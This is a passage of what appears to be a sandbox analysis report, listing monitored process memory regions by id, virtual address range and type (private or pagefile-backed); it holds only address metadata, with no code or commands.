0x8690000 end_va = 0x8738fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5892 start_va = 0x8390000 end_va = 0x843cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008390000" filename = "" Region: id = 5893 start_va = 0x8690000 end_va = 0x873dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5894 start_va = 0x8390000 end_va = 0x8437fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008390000" filename = "" Region: id = 5895 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5896 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5897 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5898 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5899 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5900 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5901 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5902 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5903 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5904 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5905 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5906 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5907 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5908 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5909 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5910 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5911 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5912 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5913 start_va = 0x72a0000 end_va = 0x7796fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072a0000" filename = "" Region: id = 5914 start_va = 0x77a0000 end_va = 0x7c97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077a0000" filename = "" Region: id = 5915 start_va = 0x8440000 end_va = 0x84c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008440000" filename = "" Region: id = 5916 start_va = 0x8690000 end_va = 0x871efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5917 start_va = 0x8440000 end_va = 0x84d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008440000" filename = "" Region: id = 5918 start_va = 0x8690000 end_va = 0x871ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5919 start_va = 0x8440000 end_va = 0x84d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008440000" filename = "" Region: id = 5920 start_va = 0x8690000 end_va = 0x872dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5921 start_va = 0x8440000 end_va = 0x84defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008440000" filename = "" Region: id = 5922 start_va = 0x8690000 end_va = 0x872ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5923 start_va = 0x8440000 end_va = 0x84e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008440000" filename = "" Region: id = 5924 start_va = 0x8690000 end_va = 0x8742fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5925 start_va = 0x8440000 end_va = 0x84eefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008440000" filename = "" Region: id = 5926 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5927 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5928 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5929 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5930 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5931 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5932 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5933 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5934 start_va = 0x72a0000 end_va = 0x7793fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072a0000" filename = "" Region: id = 5935 start_va = 0x77a0000 end_va = 0x7c95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077a0000" filename = "" Region: id = 5936 start_va = 0x84f0000 end_va = 0x857ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084f0000" filename = "" Region: id = 5937 start_va = 0x8690000 end_va = 0x8724fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5938 start_va = 0x84f0000 end_va = 0x857efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084f0000" filename = "" Region: id = 5939 start_va = 0x8690000 end_va = 0x8729fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5940 start_va = 0x84f0000 end_va = 0x8583fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084f0000" filename = "" Region: id = 5941 start_va = 0x8690000 end_va = 0x872ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5942 start_va = 0x84f0000 end_va = 0x8589fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084f0000" filename = "" Region: id = 5943 start_va = 0x8690000 end_va = 0x8733fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5944 start_va = 0x84f0000 end_va = 0x859afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084f0000" filename = "" Region: id = 5945 start_va = 0x8690000 end_va = 0x873dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5946 start_va = 0x84f0000 end_va = 0x859ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084f0000" filename = "" Region: id = 5947 start_va = 0x72a0000 end_va = 0x7797fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072a0000" filename = "" Region: id = 5948 start_va = 0x77a0000 end_va = 0x7c93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077a0000" filename = "" Region: id = 5949 start_va = 0x8690000 end_va = 0x8713fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5950 start_va = 0x8800000 end_va = 0x8886fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 5951 start_va = 0x8690000 end_va = 0x871ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5952 start_va = 0x8800000 end_va = 0x8890fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 5953 start_va = 0x8690000 end_va = 0x8722fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5954 start_va = 0x8800000 end_va = 0x8896fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 5955 start_va = 0x8690000 end_va = 0x872afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5956 start_va = 0x8800000 end_va = 0x88aafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 5957 start_va = 0x8690000 end_va = 0x8738fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5958 start_va = 0x8800000 end_va = 0x88aefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 5959 start_va = 0x8690000 end_va = 0x8735fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5960 start_va = 0x72a0000 end_va = 0x7795fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072a0000" filename = "" Region: id = 5961 start_va = 0x77a0000 end_va = 0x7c9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077a0000" filename = "" Region: id = 5962 start_va = 0x8800000 end_va = 0x888cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 5963 start_va = 0x8890000 end_va = 0x8924fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008890000" filename = "" Region: id = 5964 start_va = 0x8890000 end_va = 0x892afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008890000" filename = "" Region: id = 5965 start_va = 0x8930000 end_va = 0x89c5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008930000" filename = "" Region: id = 5966 start_va = 0x8800000 end_va = 0x889afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 5967 start_va = 0x88a0000 end_va = 0x893cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000088a0000" filename = "" Region: id = 5968 start_va = 0x8800000 end_va = 0x889efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 5969 start_va = 0x88a0000 end_va = 0x8949fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000088a0000" filename = "" Region: id = 5970 start_va = 0x8950000 end_va = 0x8a04fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008950000" filename = "" Region: id = 5971 start_va = 0x8800000 end_va = 0x88adfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 5972 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5973 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 5974 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5975 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 5976 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5977 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 5978 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5979 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 5980 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5981 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 5982 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5983 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 5984 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5985 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 5986 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5987 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 5988 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5989 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 5990 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5991 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 5992 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5993 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 5994 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5995 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 5996 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5997 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 5998 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5999 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6000 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6001 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6002 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6003 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6004 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6005 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6006 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6007 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6008 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6009 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6010 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6011 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6012 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6013 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6014 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6015 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6016 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6017 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6018 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6019 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6020 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6021 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6022 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6023 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6024 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6025 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6026 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6027 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6028 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6029 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6030 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6031 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6032 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6033 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6034 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6035 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6036 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6037 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6038 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6039 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6040 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6041 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6042 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6043 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6044 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6045 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6046 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6047 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6048 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6049 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6050 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6051 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6052 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6053 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6054 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6055 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6056 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6057 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6058 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6059 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6060 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6061 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6062 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6063 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6064 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6065 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6066 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6067 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6068 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6069 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6070 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6071 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6072 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6073 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6074 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6075 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6076 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename 